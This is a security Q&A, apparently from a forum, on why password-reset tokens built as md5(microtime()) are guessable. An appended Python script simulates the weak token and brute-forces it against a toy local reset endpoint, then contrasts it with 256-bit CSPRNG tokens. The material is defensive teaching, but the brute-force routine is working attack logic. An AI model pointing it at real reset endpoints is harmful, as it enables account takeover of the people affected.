Is using microtime() to generate password-reset tokens bad practice?


Question

In PHP I've noticed some frameworks make use of the microtime() function to generate password reset tokens, as in:

  $token = md5(microtime());

Is this a security issue? If the attacker is able to synchronize the clocks with the server to a degree of accuracy, they could brute-force the token. One second of synchronization will only require 1,000,000 tries, and this is not too crazy of an issue.

How likely is this attack to succeed? Should one be generating tokens with /dev/urandom or openssl_pseudo_bytes() instead? Is microtime() bad practice?

Accepted answer

Yes, it is a security issue! Generating tokens from the time is a very bad practice. Burp Suite makes it trivial for an attacker to brute-force tokens that are predictable, and tokens based on time are very predictable. Burp allows someone to easily gather tokens and perform statistical analysis on them to determine entropy. Using this info you can easily predict future tokens.

Remember, the attacker only needs to get it right once. Getting it wrong millions of times makes no difference.

Here is a useful (and recent) StackOverflow post about token generation that may be helpful to you: REST Web Service authentication token implementation
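As an added example (not code from the question or the answer above), the following Python script makes the brute-force in the question concrete. It simulates the string PHP's `microtime()` returns (`"0.04200000 1700000000"`), builds the token exactly as `md5(microtime())` does, and then plays the attacker: every candidate for a guessed window of server clock values is submitted to a toy reset endpoint, which is the oracle Burp Intruder would hammer. The search space is 10^6 guesses per second of clock uncertainty (about 20 bits), against 256 bits for a token drawn from the OS CSPRNG (`secrets.token_hex`, the equivalent of PHP's `bin2hex(random_bytes(32))`). The timestamps, the `ResetServer` class and the window sizes are constructed for illustration.

```python
import hashlib
import hmac
import math
import secrets

USEC_PER_SEC = 1_000_000


def php_microtime(seconds: int, microseconds: int) -> str:
    """Simulate the string PHP's microtime() returns with no argument.

    Format is "msec sec", e.g. "0.04200000 1700000000": six microsecond
    digits padded to eight, a space, then the Unix timestamp. Real PHP reads
    the server clock; here both parts are supplied so the example is
    deterministic (constructed values, not a live clock).
    """
    if not 0 <= microseconds < USEC_PER_SEC:
        raise ValueError("microseconds must be in [0, 1000000)")
    return f"0.{microseconds:06d}00 {seconds}"


def weak_token(seconds: int, microseconds: int) -> str:
    """The generator from the question: md5(microtime()) as a hex string."""
    return hashlib.md5(php_microtime(seconds, microseconds).encode()).hexdigest()


def strong_token(n_bytes: int = 32) -> str:
    """Token from the OS CSPRNG (256 bits), unrelated to the clock.
    PHP equivalent: bin2hex(random_bytes(32))."""
    return secrets.token_hex(n_bytes)


class ResetServer:
    """Toy reset endpoint (constructed for this example) that holds one
    outstanding token and counts redemption attempts: the attacker's oracle."""

    def __init__(self, token_hex: str):
        self._token = token_hex
        self.attempts = 0

    def redeem(self, candidate: str) -> bool:
        self.attempts += 1
        # Constant-time comparison so the endpoint itself leaks no timing.
        return hmac.compare_digest(self._token, candidate)


def candidate_tokens(start_second: int, window_seconds: int):
    """Attacker side: every md5(microtime()) value the server could have
    produced in [start_second, start_second + window_seconds), i.e. 10^6
    candidates per second of clock uncertainty."""
    for sec in range(start_second, start_second + window_seconds):
        suffix = b"00 %d" % sec
        for usec in range(USEC_PER_SEC):
            yield hashlib.md5(b"0.%06d" % usec + suffix).hexdigest()


def attack(server: ResetServer, start_second: int, window_seconds: int):
    """Submit each candidate to the endpoint; return the accepted token or None."""
    for cand in candidate_tokens(start_second, window_seconds):
        if server.redeem(cand):
            return cand
    return None


def search_space_bits(window_seconds: int) -> float:
    """log2 of the guesses a time-based token admits for a given clock
    uncertainty, for comparison with the 256 bits of strong_token()."""
    return math.log2(window_seconds * USEC_PER_SEC)


if __name__ == "__main__":
    # Constructed clock value; the attacker knows it only to within a few seconds.
    sec, usec = 1_700_000_000, 42_000
    weak = ResetServer(weak_token(sec, usec))
    found = attack(weak, sec - 1, 3)
    print(f"weak token recovered: {found} after {weak.attempts} attempts")
    strong = ResetServer(strong_token())
    print(f"strong token recovered: {attack(strong, sec - 1, 1)} after {strong.attempts} attempts")
    print(f"search space: {search_space_bits(1):.1f} bits per second of window vs 256 bits")
```

Note that the attack does not need the token itself, only a rough idea of when the reset was requested, which the attacker controls by making the request. Rate limiting and short token lifetimes raise the cost but do not fix the root cause; the fix is to take the token from a CSPRNG and, ideally, store only a hash of it server-side.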
